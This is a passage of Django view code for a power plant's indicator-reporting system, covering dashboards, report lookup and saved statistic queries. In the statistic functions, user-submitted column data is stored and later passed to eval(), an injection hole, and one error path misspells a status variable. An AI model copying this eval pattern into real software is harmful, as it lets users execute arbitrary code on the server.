{\"target\": \"SWDL_9F\", \"v_type\": \"cumulativeyear\", \"value\": 0} # 已完成\n ],\n ]\n },\n }\n\n # **************\n # 燃热\n # **************\n # 经营指标\n rr_jyzbs = data[\"RR\"][\"JYZB\"]\n for rr_jyzb in rr_jyzbs:\n rr_jyzb_code = rr_jyzb[\"target\"]\n recent_data = get_target_data_recently(rr_jyzb_code)\n rr_jyzb[\"value\"] = recent_data.get(rr_jyzb[\"v_type\"], 0)\n rr_jyzb[\"target_name\"] = recent_data[\"target_name\"]\n rr_jyzb[\"unit\"] = recent_data[\"unit\"]\n\n # 环保指标\n rr_hbzbs = data[\"RR\"][\"HBZB\"]\n for rr_hbzb in rr_hbzbs:\n rr_hbzb_code = rr_hbzb[\"target\"]\n recent_data = get_target_data_recently(rr_hbzb_code)\n rr_hbzb[\"value\"] = recent_data.get(rr_hbzb[\"v_type\"], 0)\n rr_hbzb[\"target_name\"] = recent_data[\"target_name\"]\n rr_hbzb[\"unit\"] = recent_data[\"unit\"]\n # 年计划\n rr_njhs = data[\"RR\"][\"FDL_JH\"]\n for rr_njh in rr_njhs:\n for rn in rr_njh:\n recent_data = get_target_data_recently(rn[\"target\"])\n rn[\"value\"] = recent_data.get(rn[\"v_type\"], 0)\n rn[\"target_name\"] = recent_data[\"target_name\"]\n # **************\n # 煤机\n # **************\n # 经营指标\n mj_jyzbs = data[\"MJ\"][\"JYZB\"]\n for mj_jyzb in mj_jyzbs:\n mj_jyzb_code = mj_jyzb[\"target\"]\n recent_data = get_target_data_recently(mj_jyzb_code)\n mj_jyzb[\"value\"] = recent_data.get(mj_jyzb[\"v_type\"], 0)\n mj_jyzb[\"target_name\"] = recent_data[\"target_name\"]\n mj_jyzb[\"unit\"] = recent_data[\"unit\"]\n\n # 环保指标\n mj_hbzbs = data[\"MJ\"][\"HBZB\"]\n for mj_hbzb in mj_hbzbs:\n mj_hbzb_code = mj_hbzb[\"target\"]\n recent_data = get_target_data_recently(mj_hbzb_code)\n mj_hbzb[\"value\"] = recent_data.get(mj_hbzb[\"v_type\"], 0)\n mj_hbzb[\"target_name\"] = recent_data[\"target_name\"]\n mj_hbzb[\"unit\"] = recent_data[\"unit\"]\n\n # 年计划\n mj_njhs = data[\"MJ\"][\"FDL_JH\"]\n for mj_njh in mj_njhs:\n for mn in mj_njh:\n recent_data = get_target_data_recently(mn[\"target\"])\n mn[\"value\"] = recent_data.get(mn[\"v_type\"], 0)\n mn[\"target_name\"] = recent_data[\"target_name\"]\n # **************\n # 9F\n # **************\n # 经营指标\n jf_jyzbs = data[\"9F\"][\"JYZB\"]\n for jf_jyzb in jf_jyzbs:\n jf_jyzb_code = jf_jyzb[\"target\"]\n recent_data = get_target_data_recently(jf_jyzb_code)\n jf_jyzb[\"value\"] = recent_data.get(jf_jyzb[\"v_type\"], 0)\n jf_jyzb[\"target_name\"] = recent_data[\"target_name\"]\n jf_jyzb[\"unit\"] = recent_data[\"unit\"]\n\n # 环保指标\n jf_hbzbs = data[\"9F\"][\"HBZB\"]\n for jf_hbzb in jf_hbzbs:\n jf_hbzb_code = jf_hbzb[\"target\"]\n recent_data = get_target_data_recently(jf_hbzb_code)\n jf_hbzb[\"value\"] = recent_data.get(jf_hbzb[\"v_type\"], 0)\n jf_hbzb[\"target_name\"] = recent_data[\"target_name\"]\n jf_hbzb[\"unit\"] = recent_data[\"unit\"]\n\n # 年计划\n jf_njhs = data[\"9F\"][\"FDL_JH\"]\n for jf_njh in jf_njhs:\n for jn in jf_njh:\n recent_data = get_target_data_recently(jn[\"target\"])\n jn[\"value\"] = recent_data.get(jn[\"v_type\"], 0)\n jn[\"target_name\"] = recent_data[\"target_name\"]\n\n # ***************\n # 首页进程监控信息\n # ***************\n targets = Target.objects.filter(operationtype__in=[16, 1]).exclude(state=9).values('source_id', 'adminapp_id', 'cycle_id')\n def does_it_exist(source, adminapp=None, cycle=None):\n if source and not any([adminapp, cycle]):\n for t in targets:\n if source == t['source_id']:\n return True\n if all([source, adminapp]) and not cycle:\n for t in targets:\n if source == t['source_id'] and adminapp == t['adminapp_id']:\n return True\n if all([source, adminapp, cycle]):\n for t in targets:\n if source == t['source_id'] and adminapp == t['adminapp_id'] and cycle == t['cycle_id']:\n return True\n return False\n source = Source.objects.exclude(state='9')\n app = App.objects.exclude(state='9')\n cycle = Cycle.objects.exclude(state='9')\n jk_info = [{\"work\": \"应用名称:\", \"cycle\": \"周期名称:\", \"last_time\": \"最新取数时间:\", \"remark\": \"运行说明:\"}]\n f_jk_info = []\n now_time = datetime.datetime.now()\n for s in source:\n if not s.type:\n if does_it_exist(s.id):\n for a in app:\n if does_it_exist(s.id, a.id):\n for c in cycle:\n if does_it_exist(s.id, a.id, c.id):\n cps = ProcessMonitor.objects.filter(source_id=s.id).filter(app_admin_id=a.id).\\\n filter(cycle_id=c.id).exclude(state='9')\n if cps.exists():\n cp = cps[0]\n remark = ''\n jk_dict = {}\n if cp.status == '运行中':\n if cp.last_time:\n lasttime_from_now = (now_time - cp.last_time).total_seconds() / 60 / 60\n if (lasttime_from_now) > 1:\n remark = '1小时内没有进行取数,请校对。'\n else:\n remark = '运行正常。'\n else:\n remark = '进程已关闭,请开启。'\n jk_dict['last_time'] = '{:%Y-%m-%d %H:%M:%S}'.format(\n cp.last_time) if cp.last_time else \"\"\n jk_dict['remark'] = remark\n jk_dict['work'] = cp.app_admin.name\n jk_dict['cycle'] = cp.cycle.name\n jk_info.append(jk_dict)\n else:\n # 固定节点(数据补取、数据清理)\n f_jk_dict = {}\n f_cps = ProcessMonitor.objects.filter(source_id=s.id).exclude(state='9')\n if f_cps.exists():\n f_cp = f_cps[0]\n if f_cp.status == '运行中':\n remark = '运行正常。'\n else:\n remark = '进程已关闭,请开启。'\n f_jk_dict['last_time'] = '{:%Y-%m-%d %H:%M:%S}'.format(f_cp.last_time) if f_cp.last_time else \"无\"\n f_jk_dict['remark'] = remark\n f_jk_dict['work'] = f_cp.source.name\n f_jk_dict['cycle'] = \"无\"\n f_jk_info.append(f_jk_dict)\n jk_info += f_jk_info\n return JsonResponse({\n \"status\": status,\n \"data\": data,\n \"jk_info\": jk_info\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef report_search(request, funid):\n if request.user.is_authenticated():\n app_id = \"\"\n try:\n funid = int(funid)\n except ValueError:\n pass\n c_app = get_app_from_fun(funid)\n if not c_app[\"err\"]:\n app_id = c_app[\"app_id\"]\n\n return render(request, 'report_search.html', {\n 'username': request.user.userinfo.fullname,\n \"pagefuns\": getpagefuns(funid, request),\n \"app_id\": app_id,\n })\n else:\n return HttpResponseRedirect('/login')\n\n\ndef get_report_search_data(request):\n \"\"\"获取已发布报表时间等信息,以树的形式展示\n 镇海电厂\n > 应用\n > 周期\n > 报表名称\n 时间 状态 \n \"\"\"\n if request.user.is_authenticated():\n status = 1\n info = \"\"\n app_id = request.POST.get(\"app_id\", \"\")\n\n # 应用 App\n # 报表类型 DictList DictIndex=7\n # 报表记录 ReportSubmit ReportModel\n apps = App.objects.exclude(state=\"9\")\n try:\n app_id = int(app_id)\n apps = apps.filter(id=app_id)\n except ValueError:\n pass\n\n cycles = DictList.objects.exclude(state=\"9\").filter(dictindex_id=12).values()\n report_submits = ReportSubmit.objects.filter(state=\"1\").order_by(\"-report_time\").values(\n \"id\", \"app_id\", \"report_model_id\", \"report_model__name\", \"state\", \"person\", \"write_time\", \"report_time\",\n \"report_model__report_type\", \"report_model__code\", \"report_model__file_name\"\n )\n report_models = ReportModel.objects.exclude(state=\"9\").values()\n\n rs = ReportServer.objects.first()\n report_server = rs.report_server if rs else ''\n\n # 周期 报表类型对应字典\n # 根据周期匹配报表类型\n compile_dict = {\n 10: 22,\n 11: 23,\n 12: 24,\n 13: 25,\n 14: 26\n }\n\n root_info = {}\n root_info[\"text\"] = \"镇海电厂\"\n root_info[\"type\"] = \"node\"\n root_info[\"state\"] = {'opened': True}\n\n app_list = []\n for app in apps:\n app_info = {}\n app_info[\"text\"] = app.name\n app_info[\"type\"] = \"node\"\n app_info[\"data\"] = {\n \"name\": app.name,\n \"code\": app.code\n }\n funs = app.fun_set.exclude(state=\"9\").filter(url__contains=\"report_submit\")\n fun_id = funs[0].id if funs else \"\"\n cur_url = funs[0].url if funs else \"\"\n\n cycle_list = []\n for cycle in cycles:\n cycle_info = {}\n cycle_info[\"text\"] = cycle['name']\n cycle_info[\"type\"] = \"node\"\n cycle_info[\"data\"] = {\n \"id\": cycle[\"id\"],\n \"name\": cycle[\"name\"]\n }\n\n report_model_list = []\n for report_model in report_models:\n report_model_info = {}\n\n report_type = \"\"\n try:\n report_type = compile_dict[cycle[\"id\"]]\n except Exception:\n pass\n if report_model[\"app_id\"] == app.id and report_model[\"report_type\"] == str(report_type):\n report_model_info[\"text\"] = report_model[\"name\"]\n report_model_info[\"type\"] = \"file\"\n\n # 报表数据\n report_submit_list = []\n for report_submit in report_submits:\n if report_submit[\"report_model_id\"] == report_model[\"id\"]:\n # 周期类型 + 时间\n params = \"?report_type={report_type}&report_time={report_time}\".format(**{\n \"report_type\": report_type,\n \"report_time\": get_format_date(report_submit[\"report_time\"], str(cycle[\"id\"]), type=\"E\") if report_submit[\"report_time\"] else \"\",\n })\n\n if fun_id:\n url = \"{0}/{1}{2}\".format(cur_url, fun_id, params) if not cur_url.endswith(\"/\") else \"{0}{1}{2}\".format(cur_url, fun_id, params)\n else:\n url = \"/index\"\n\n report_submit_list.append({\n \"name\": report_submit[\"report_model__name\"],\n \"write_time\": \"{0:%Y-%m-%d %H:%M:%S}\".format(report_submit[\"write_time\"]) if report_submit[\"write_time\"] else \"\",\n \"report_time\": get_format_date(report_submit[\"report_time\"], str(cycle[\"id\"])) if report_submit[\"report_time\"] else \"\",\n \"person\": report_submit[\"person\"],\n \"code\": report_submit[\"report_model__code\"],\n\n \"url\": url,\n \"relative_file_name\": app.code + '/' + report_submit[\"report_model__file_name\"],\n \"report_server\": report_server,\n \"reporting_date\": \"{0:%Y-%m-%d}\".format(report_submit[\"report_time\"]) if report_submit[\"report_time\"] else \"\",\n \"report_type_id\": report_type,\n })\n report_model_info[\"data\"] = report_submit_list\n report_model_list.append(report_model_info)\n\n if not report_model_list:\n continue\n cycle_info[\"children\"] = report_model_list\n cycle_list.append(cycle_info)\n\n app_info[\"children\"] = cycle_list\n app_list.append(app_info)\n root_info[\"children\"] = app_list\n return JsonResponse({\n \"status\": status,\n \"info\": info,\n \"data\": root_info\n })\n else:\n return HttpResponseRedirect('/login')\n\n\ndef target_value_search(request, funid):\n if request.user.is_authenticated():\n # 管理应用id\n app_id = \"\"\n try:\n funid = int(funid)\n except ValueError:\n pass\n c_app = get_app_from_fun(funid)\n if not c_app[\"err\"]:\n app_id = c_app[\"app_id\"]\n\n # 月初 -> 现在\n n_time = datetime.datetime.now()\n end_date = \"{:%Y-%m-%d}\".format(n_time)\n start_date = \"{:%Y-%m-%d}\".format(n_time.replace(day=1))\n return render(request, 'target_value_search.html', {\n 'username': request.user.userinfo.fullname, \"pagefuns\": getpagefuns(funid, request),\n \"app_id\": app_id, \"start_date\": start_date, \"end_date\": end_date,\n })\n else:\n return HttpResponseRedirect('/login')\n\n\ndef get_target_value(c_target, start_date, end_date):\n \"\"\"\n start_date与end_date必须在同一年\n :param operation_type:\n :param start_date:\n :param end_date:\n :return:\n \"\"\"\n data = []\n model_map = {\n \"1\": \"Meterdata\",\n \"15\": \"Entrydata\",\n \"16\": \"Extractdata\",\n \"17\": \"Calculatedata\",\n }\n if c_target:\n operation_type = c_target.operationtype\n target_id = c_target.id\n model_name = \"\"\n try:\n model_name = model_map[operation_type]\n except Exception:\n pass\n\n appointed_time_object = None\n\n if model_name:\n if not start_date and end_date:\n appointed_time_object = getmodels(model_name, str(end_date.year)).objects.exclude(state=\"9\").filter(target_id=target_id).filter(datadate__lte=end_date.date())\n if start_date and not end_date:\n appointed_time_object = getmodels(model_name, str(start_date.year)).objects.exclude(state=\"9\").filter(target_id=target_id).filter(datadate__gte=start_date.date())\n if all([start_date, end_date]):\n appointed_time_object = getmodels(model_name, str(start_date.year)).objects.exclude(state=\"9\").filter(target_id=target_id).filter(\n Q(datadate__gte=start_date.date()) & Q(datadate__lte=end_date.date())\n )\n # 对值的处理\n for ato in appointed_time_object.values(\n \"curvalue\", \"target__name\", \"target__code\", \"target__unity\", \"datadate\", \"target__digit\",\n \"cumulativemonth\", \"cumulativequarter\", \"cumulativehalfyear\", \"cumulativeyear\",\n ):\n data.append({\n \"name\": ato[\"target__name\"],\n \"code\": ato[\"target__code\"],\n \"unity\": ato[\"target__unity\"],\n \"curvalue\": round(ato[\"curvalue\"] if ato[\"curvalue\"] else 0, ato[\"target__digit\"]),\n \"cumulativemonth\": round(ato[\"cumulativemonth\"] if ato[\"cumulativemonth\"] else 0, ato[\"target__digit\"]),\n \"cumulativequarter\": round(ato[\"cumulativequarter\"] if ato[\"cumulativequarter\"] else 0, ato[\"target__digit\"]),\n \"cumulativehalfyear\": round(ato[\"cumulativehalfyear\"] if ato[\"cumulativehalfyear\"] else 0, ato[\"target__digit\"]),\n \"cumulativeyear\": round(ato[\"cumulativeyear\"] if ato[\"cumulativeyear\"] else 0, ato[\"target__digit\"]),\n \"datadate\": ato[\"datadate\"]\n })\n\n return data\n\n\ndef get_target_search_data(request):\n \"\"\"\n 查询指标数据\n start_date end_date 可能不在同一年\n :param request:\n :return:\n \"\"\"\n if request.user.is_authenticated():\n status = 1\n info = \"\"\n all_data = []\n\n target = request.POST.get(\"target\", \"\")\n start_date = request.POST.get(\"start_date\", \"\")\n end_date = request.POST.get(\"end_date\", \"\")\n app_id = request.POST.get(\"app_id\", \"\")\n try:\n app_id = int(app_id)\n except ValueError:\n pass\n if not target:\n status = 0\n info = '指标代码或者指标名称未填写。'\n elif not start_date:\n status = 0\n info = \"开始时间未选择。\"\n elif not end_date:\n status = 0\n info = \"结束时间未选择。\"\n else:\n # 判断开始时间与结束时间是否在同一年\n start_date = datetime.datetime.strptime(start_date, \"%Y-%m-%d\")\n end_date = datetime.datetime.strptime(end_date, \"%Y-%m-%d\")\n\n if start_date > end_date:\n status = 0\n info = \"开始时间不得迟于结束时间。\"\n else:\n c_targets = Target.objects.exclude(state=\"9\").filter(Q(name__icontains=target) | Q(code__icontains=target)).filter(\n Q(adminapp__id=app_id) | Q(app__id=app_id)\n )\n for c_target in c_targets:\n data = []\n\n start_date_year = start_date.year\n end_date_year = end_date.year\n delta_year = end_date_year - start_date_year\n if delta_year == 0: # 同一年\n target_values = get_target_value(c_target, start_date, end_date)\n data = [{\n \"name\": tv[\"name\"],\n \"code\": tv[\"code\"],\n \"unity\": tv[\"unity\"],\n \"curvalue\": tv[\"curvalue\"],\n \"cumulativemonth\": tv[\"cumulativemonth\"],\n \"cumulativequarter\": tv[\"cumulativequarter\"],\n \"cumulativehalfyear\": tv[\"cumulativehalfyear\"],\n \"cumulativeyear\": tv[\"cumulativeyear\"],\n \"time\": \"{0:%Y-%m-%d}\".format(tv[\"datadate\"]) if tv[\"datadate\"] else \"\",\n } for tv in target_values]\n else:\n # 开始时间到年底\n s_target_values = [{\n \"name\": tv[\"name\"],\n \"code\": tv[\"code\"],\n \"unity\": tv[\"unity\"],\n \"curvalue\": tv[\"curvalue\"],\n \"cumulativemonth\": tv[\"cumulativemonth\"],\n \"cumulativequarter\": tv[\"cumulativequarter\"],\n \"cumulativehalfyear\": tv[\"cumulativehalfyear\"],\n \"cumulativeyear\": tv[\"cumulativeyear\"],\n \"time\": \"{0:%Y-%m-%d}\".format(tv[\"datadate\"]) if tv[\"datadate\"] else \"\",\n } for tv in get_target_value(c_target, start_date, None)]\n # 结束时间到年初\n e_target_values = [{\n \"name\": tv[\"name\"],\n \"code\": tv[\"code\"],\n \"unity\": tv[\"unity\"],\n \"curvalue\": tv[\"curvalue\"],\n \"cumulativemonth\": tv[\"cumulativemonth\"],\n \"cumulativequarter\": tv[\"cumulativequarter\"],\n \"cumulativehalfyear\": tv[\"cumulativehalfyear\"],\n \"cumulativeyear\": tv[\"cumulativeyear\"],\n \"time\": \"{0:%Y-%m-%d}\".format(tv[\"datadate\"]) if tv[\"datadate\"] else \"\",\n } for tv in get_target_value(c_target, None, end_date)]\n\n m_target_values = []\n # 2017 2019 2 >>> 2018\n if delta_year > 1:\n for i in range(0, delta_year):\n start_date_year += 1\n start_date = datetime.datetime(start_date_year, 1, 1)\n target_values = get_target_value(c_target, start_date, None)\n m_data = [{\n \"name\": tv[\"name\"],\n \"code\": tv[\"code\"],\n \"unity\": tv[\"unity\"],\n \"curvalue\": tv[\"curvalue\"],\n \"cumulativemonth\": tv[\"cumulativemonth\"],\n \"cumulativequarter\": tv[\"cumulativequarter\"],\n \"cumulativehalfyear\": tv[\"cumulativehalfyear\"],\n \"cumulativeyear\": tv[\"cumulativeyear\"],\n \"time\": \"{0:%Y-%m-%d}\".format(tv[\"datadate\"]) if tv[\"datadate\"] else \"\",\n } for tv in target_values]\n if m_data:\n m_target_values.extend(m_data)\n\n data = s_target_values + m_target_values + e_target_values\n\n all_data.extend(data)\n return JsonResponse({\n \"status\": status,\n \"info\": info,\n \"data\": sorted(all_data, key=lambda e: e.__getitem__('time'), reverse=True) if all_data else []\n })\n else:\n return HttpResponseRedirect('/login')\n\n\ndef target_statistic(request, funid):\n if request.user.is_authenticated():\n # 管理应用id\n app_id = \"\"\n try:\n funid = int(funid)\n except ValueError:\n pass\n c_app = get_app_from_fun(funid)\n if not c_app[\"err\"]:\n app_id = c_app[\"app_id\"]\n\n # 周期类型\n cycle_list = DictList.objects.exclude(state=\"9\").filter(dictindex_id=12)\n\n return render(request, 'target_statistic.html', {\n 'username': request.user.userinfo.fullname, \"pagefuns\": getpagefuns(funid, request),\n \"cycle_list\": cycle_list, \"app_id\": app_id,\n })\n else:\n return HttpResponseRedirect('/login')\n\n\ndef target_insert_data(request):\n if request.user.is_authenticated():\n result = []\n\n search_adminapp = request.GET.get('search_adminapp', '')\n\n search_operationtype = request.GET.get('search_operationtype', '')\n search_cycletype = request.GET.get('search_cycletype', '')\n search_businesstype = request.GET.get('search_businesstype', '')\n search_unit = request.GET.get('search_unit', '')\n datatype = request.GET.get('datatype', '')\n\n try:\n search_adminapp = int(search_adminapp)\n except:\n pass\n all_target = Target.objects.exclude(state=\"9\").order_by(\"sort\").filter(Q(adminapp__id=search_adminapp) | Q(app__id=search_adminapp))\n\n if search_operationtype != \"\":\n all_target = all_target.filter(operationtype=int(search_operationtype))\n if search_cycletype != \"\":\n all_target = all_target.filter(cycletype=int(search_cycletype))\n if search_businesstype != \"\":\n all_target = all_target.filter(businesstype=int(search_businesstype))\n if search_unit != \"\":\n all_target = all_target.filter(unit=int(search_unit))\n if datatype != \"\":\n all_target = all_target.filter(datatype=datatype)\n\n all_dict_list = DictList.objects.exclude(state='9').values('id', 'name')\n cumulative_dict = {\n \"0\": \"不累计\",\n \"1\": \"求和\",\n \"2\": \"算数平均\",\n \"3\": \"加权平均\",\n \"4\": \"非零算数平均\",\n \"5\": \"求和(上月)(环保专用)\"\n }\n for target in all_target:\n cycletype = target.cycletype\n if cycletype:\n for dict in all_dict_list:\n if cycletype == str(dict['id']):\n cycletype = dict['name']\n break\n result.append({\n \"id\": target.id,\n \"name\": target.name,\n \"code\": target.code,\n \"cycletype_name\": cycletype,\n \"cumulative\": cumulative_dict[target.cumulative],\n \"adminapp_name\": target.adminapp.name\n })\n return JsonResponse({\"data\": result})\n\n\ndef target_statistic_data(request):\n \"\"\"\n data = [{\n \"id\": 1,\n \"name\": \"查询1\",\n \"type\": \"10\",\n \"type_name\": \"日\",\n \"remark\": \"说明1\",\n \"target_col\": [{\n \"name\": \"第一列\",\n \"targets\": [{\"target_id\": 35, \"new_target_name\": \"新指标名1\", \"target_name\": \"指标1\"}, {\"target_id\": 36, \"new_target_name\": \"新指标名2\", \"target_name\": \"指标2\"}],\n \"remark\": \"指标列说明\",\n \"statistc_type\": \"0\"\n }, {\n \"name\": \"第二列\",\n \"targets\": [{\"target_id\": 37, \"new_target_name\": \"新指标名3\"}],\n \"remark\": \"指标列说明\",\n \"statistc_type\": \"1\"\n }]\n }, {\n \"id\": 2,\n \"name\": \"查询2\",\n \"type\": \"11\",\n \"type_name\": \"月\",\n \"remark\": \"说明2\",\n \"target_col\": [],\n }]\n :param request:\n :return:\n \"\"\"\n if request.user.is_authenticated():\n status = 1\n info = \"\"\n data = []\n\n target_statistics = TargetStatistic.objects.exclude(state=\"9\").order_by(\"sort\")\n type_list = DictList.objects.filter(dictindex_id=12).values()\n\n for target_statistic in target_statistics:\n if request.user.userinfo == target_statistic.user or request.user.is_superuser:\n type_name = \"\"\n for tl in type_list:\n if str(tl['id']) == target_statistic.type:\n type_name = tl['name']\n\n target_col = eval(target_statistic.col_data)\n data.append({\n \"id\": target_statistic.id,\n \"name\": target_statistic.name,\n \"type\": target_statistic.type,\n \"type_name\": type_name,\n \"remark\": target_statistic.remark,\n \"sort\": target_statistic.sort,\n \"target_col\": target_col\n })\n\n return JsonResponse({\n \"status\": status,\n \"info\": info,\n \"data\": data\n })\n else:\n return HttpResponseRedirect('/login')\n\n\ndef target_statistic_save(request):\n if request.user.is_authenticated():\n status = 1\n info = \"\"\n\n id = request.POST.get(\"id\", \"\")\n col_data = request.POST.get(\"col_data\", \"\")\n name = request.POST.get(\"name\", \"\")\n type = request.POST.get(\"type\", \"\")\n remark = request.POST.get(\"remark\", \"\")\n sort = request.POST.get(\"sort\", \"\")\n\n try:\n id = int(id)\n except Exception:\n status = 0\n info = \"网络异常。\"\n else:\n if not name:\n status = 0\n info = \"查询名不能为空。\"\n elif not type:\n status = 0\n info = \"查询类型不能为空。\"\n else:\n try:\n col_data = json.loads(col_data)\n except Exception:\n pass\n\n if id == 0:\n try:\n TargetStatistic.objects.create(**{\n \"name\": name,\n \"type\": type,\n \"remark\": remark,\n \"sort\": int(sort) if sort else None,\n \"col_data\": col_data,\n \"user\": request.user.userinfo,\n })\n info = \"新增成功。\"\n except Exception as e:\n\n stauts = 0\n info = \"新增查询失败。\"\n else:\n try:\n TargetStatistic.objects.filter(id=id).update(**{\n \"name\": name,\n \"type\": type,\n \"remark\": remark,\n \"sort\": int(sort) if sort else None,\n \"col_data\": col_data,\n # \"user\": request.user.userinfo, # 编辑时不保存用户\n })\n info = \"修改成功。\"\n except Exception as e:\n status = 0\n info = \"修改查询失败。\"\n return JsonResponse({\n \"status\": status,\n \"info\": info\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef target_statistic_del(request):\n if request.user.is_authenticated():\n status = 1\n info = \"删除成功。\"\n\n id = request.POST.get(\"id\", \"\")\n\n try:\n TargetStatistic.objects.filter(id=int(id)).update(**{\"state\": \"9\"})\n except Exception:\n status = 0\n info = \"删除失败。\"\n\n return JsonResponse({\n \"status\": status,\n \"info\": info\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef statistic_report(request):\n \"\"\"\n\n @param request:\n @return: e_date\n s_date\n e_seasondate\n s_seasondate\n e_yeardate\n s_yeardate\n \"\"\"\n if request.user.is_authenticated():\n date_type = request.GET.get(\"date_type\", \"\")\n search_id = request.GET.get(\"search_id\", \"\")\n\n # date_type: 日 月 季 半年 年 显示不同时间\n n_time = datetime.datetime.now()\n\n e_time = n_time.replace(hour=0, minute=0, second=0, microsecond=0) # 结束时间\n e_date = e_time.strftime(\"%Y-%m-%d\")\n s_time = n_time.replace(hour=0, minute=0, second=0, microsecond=0) # 开始时间\n s_date = s_time.strftime(\"%Y-%m-%d\")\n if date_type == '10': # 日\n \"\"\"\n 开始日期:当年当月第一天\n 结束日期:当年当月昨天\n 如果:当日为1日:开始时间:当日,结束时间:当日\n \"\"\"\n s_time = n_time.replace(day=1, hour=0, minute=0, second=0, microsecond=0)\n s_date = s_time.strftime(\"%Y-%m-%d\")\n if n_time.day != 1:\n e_time = n_time + datetime.timedelta(days=-1)\n e_date = e_time.strftime(\"%Y-%m-%d\")\n else:\n e_time = n_time\n e_date = e_time.strftime(\"%Y-%m-%d\")\n\n if date_type == '11': # 月\n \"\"\"\n 开始日期:当年第一月\n 结束日期:当年上个月\n 如果:当月为1月:开始时间:当月,结束时间:当月\n \"\"\"\n s_time = n_time.replace(month=1, hour=0, minute=0, second=0, microsecond=0)\n s_time = get_last_day_in_month(s_time)\n s_date = s_time.strftime(\"%Y-%m\")\n if n_time.month != 1:\n e_time = n_time.replace(day=1, hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(days=-1)\n e_date = e_time.strftime(\"%Y-%m\")\n else:\n e_time = n_time.replace(day=1, hour=0, minute=0, second=0, microsecond=0)\n e_date = e_time.strftime(\"%Y-%m\")\n e_seasondate = ''\n s_seasondate = ''\n if date_type == '12': # 季\n now = n_time\n month = (now.month - 1) - (now.month - 1) % 3 + 1\n now = (n_time.replace(month=month, day=1, hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(days=-1))\n s_now = now - relativedelta(months=3)\n s_now = get_last_day_in_month(s_now)\n\n def get_date_and_seasondate(c_time):\n date, seasondate = \"\", \"\"\n year = c_time.strftime(\"%Y\")\n if c_time.month in (1, 2, 3):\n season = '第1季度'\n seasondate = year + '-' + season\n date = year + '-' + \"03-31\"\n if c_time.month in (4, 5, 6):\n season = '第2季度'\n seasondate = year + '-' + season\n date = year + '-' + \"06-30\"\n if c_time.month in (7, 8, 9):\n season = '第3季度'\n seasondate = year + '-' + season\n date = year + '-' + \"09-30\"\n if c_time.month in (10, 11, 12):\n season = '第4季度'\n seasondate = year + '-' + season\n date = year + '-' + \"12-31\"\n return date, seasondate\n\n e_date, e_seasondate = get_date_and_seasondate(now)\n s_date, s_seasondate = get_date_and_seasondate(s_now)\n\n e_yeardate = ''\n s_yeardate = ''\n if date_type == '13': # 半年\n now = n_time\n month = (now.month - 1) - (now.month - 1) % 6 + 1\n now = (n_time.replace(month=month, day=1, hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(days=-1))\n s_now = now - relativedelta(months=6)\n s_now = get_last_day_in_month(s_now)\n\n def get_date_and_yeardate(c_time):\n date, yeardate = \"\", \"\"\n year = now.strftime(\"%Y\")\n if now.month in (1, 2, 3, 4, 5, 6):\n season = '上半年'\n yeardate = year + '-' + season\n date = year + '-' + \"06-30\"\n if now.month in (7, 8, 9, 10, 11, 12):\n season = '下半年'\n yeardate = year + '-' + season\n date = year + '-' + \"12-31\"\n return date, yeardate\n\n e_date, e_yeardate = get_date_and_yeardate(now)\n s_date, s_yeardate = get_date_and_yeardate(s_now)\n if date_type == '14': # 年\n now = (n_time.replace(month=1, day=1, hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(days=-1))\n s_now = now - relativedelta(months=12)\n s_now = get_last_day_in_month(s_now)\n\n e_date = now.strftime(\"%Y\")\n s_date = s_now.strftime(\"%Y\")\n\n search_name = \"\"\n try:\n search_name = TargetStatistic.objects.get(id=int(search_id)).name\n except Exception:\n pass\n\n return render(request, \"statistic_report.html\", locals())\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef get_statistic_report(request):\n \"\"\"\n rowspan if_group 为 是 =2 否 = 1\n\n colspan\t分组指标数\n\n [{\"col_name\": \"\", \"rowspan\": \"\", \"colspan\": \"\", \"targets\": [{\"name\": \"\"}, {\"name\": \"\"}]}]\n # 同一时间点 所有指标的当前值\n [{\"date\": \"2020-01-31\", \"target_values\": []}, {\"date\": \"2020-01-30\", \"target_values\": []}]\n \"\"\"\n if request.user.is_authenticated():\n start_date = request.POST.get(\"start_date\", \"\")\n end_date = request.POST.get(\"end_date\", \"\")\n search_id = request.POST.get(\"search_id\", \"\")\n date_type = request.POST.get(\"date_type\", \"\")\n\n # start_date = \"2020-01-01\"\n # end_date = \"2020-01-31\"\n # search_id = \"1\"\n\n data = {}\n status = 1\n info = \"\"\n\n head_data = [{\n \"col_name\": \"指标数据时间\",\n \"rowspan\": 2,\n \"colspan\": 1,\n \"targets\": []\n }]\n body_data = []\n v_sums = [] # 合计\n if not start_date:\n status = 0\n info = \"开始时间未选择。\"\n elif not end_date:\n status = 0\n info = \"结束时间未选择。\"\n elif not search_id:\n status = 0\n info = \"当前页面已失效,请重新访问。\"\n else:\n try:\n start_date = getreporting_date(start_date, date_type)\n end_date = getreporting_date(end_date, date_type)\n\n target_statistic = TargetStatistic.objects.get(id=int(search_id))\n col_data = target_statistic.col_data\n\n \"\"\"\n \"[{\n 'name': 'b', \n 'remark': '', \n 'targets': [\n {'new_target_name': '#1运行时间', 'target_id': '1884', 'cumulative_type': '0', 'target_name': '#1运行时间'}, \n {'new_target_name': '#2运行时间', 'target_id': '1885', 'cumulative_type': '4', 'target_name': '#2运行时间'}\n ]\n }]\"\n \"\"\"\n try:\n col_data = eval(col_data)\n except Exception as e:\n print(e)\n else:\n \"\"\"\n [{'name': '列二', 'if_group': '否', 'remark': '列二的说明', \n 'targets': [{'target_id': '21', 'target_name': '热力结算-日报-录入-002'}]}, \n \n {'name': '列一', 'if_group': '是', 'remark': '列一的说明', \n 'targets': [{'target_id': '21', 'new_target_name': '#1机组', 'target_name': '热力结算-日报-录入-002'}, \n {'target_id': '22', 'new_target_name': '#2机组', 'target_name': '热力结算-日报-录入-003'}]}]\n \"\"\"\n\n # 指定时间段内 Calculatedata Extractdata Entrydata Meterdata所有数据\n def get_target_values(operation_type, start_date, end_date, date_type):\n \"\"\"\n 获取指定时间内,不同操作类型的所有数据,包括隔年、跨年\n :param operation_type:\n :param start_date:\n :param end_date:\n :return:\n \"\"\"\n data = []\n model_map = {\n \"1\": \"Meterdata\",\n \"15\": \"Entrydata\",\n \"16\": \"Extractdata\",\n \"17\": \"Calculatedata\",\n }\n\n model_name = \"\"\n try:\n 